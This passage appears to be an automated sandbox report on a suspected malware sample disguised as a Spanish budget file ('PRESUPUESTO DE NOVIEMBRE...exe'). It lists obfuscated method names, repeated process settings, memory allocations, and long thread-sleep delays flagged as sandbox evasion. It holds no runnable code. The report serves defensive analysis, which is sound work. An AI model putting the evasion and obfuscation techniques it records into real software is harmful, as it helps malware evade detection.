Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, r2gPona6djD4Y2Uy7Gs.cs	High entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, FbgDLHLo8mv2DHccjX.cs	High entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, nrl7IZhXFOrSCsYjvM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	High entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, HRGrkx7cr8Ehxg8ycc.cs	High entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, OZdrLdz96Gdlyr8xOp.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Exsot2flOn7wu6T8a3.cs	High entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 1480000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 2F50000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 4F50000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 9240000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: A240000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: A450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: B450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: BAB0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: CAB0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: DAB0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 2FF0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 3120000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Memory allocated: 5120000 memory reserve | memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599875			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599756			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599641			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599531			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599422			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599313			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598828			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598711			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598609			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598499			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598378			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598266			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598156			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598046			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597828			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597719			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597609			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597500			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597390			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597281			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597172			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597063			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596813			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596688			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596469			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596344			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596234			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596125			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596016			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595906			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595797			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595687			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595469			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595344			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595234			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595125			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595016			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594905			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594797			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594687			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594469			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Window / User API: threadDelayed 8233			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Window / User API: threadDelayed 1615			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep count: 36 > 30			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -33204139332677172s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -600000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599875s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700	Thread sleep count: 8233 > 30			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700	Thread sleep count: 1615 > 30			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599756s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599641s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599531s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599422s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599313s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599188s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -599063s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598828s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598711s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598609s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598499s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598378s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598266s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598156s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -598046s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597828s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597719s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597609s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597500s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597390s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597281s >= -30000s			Jump to behavior
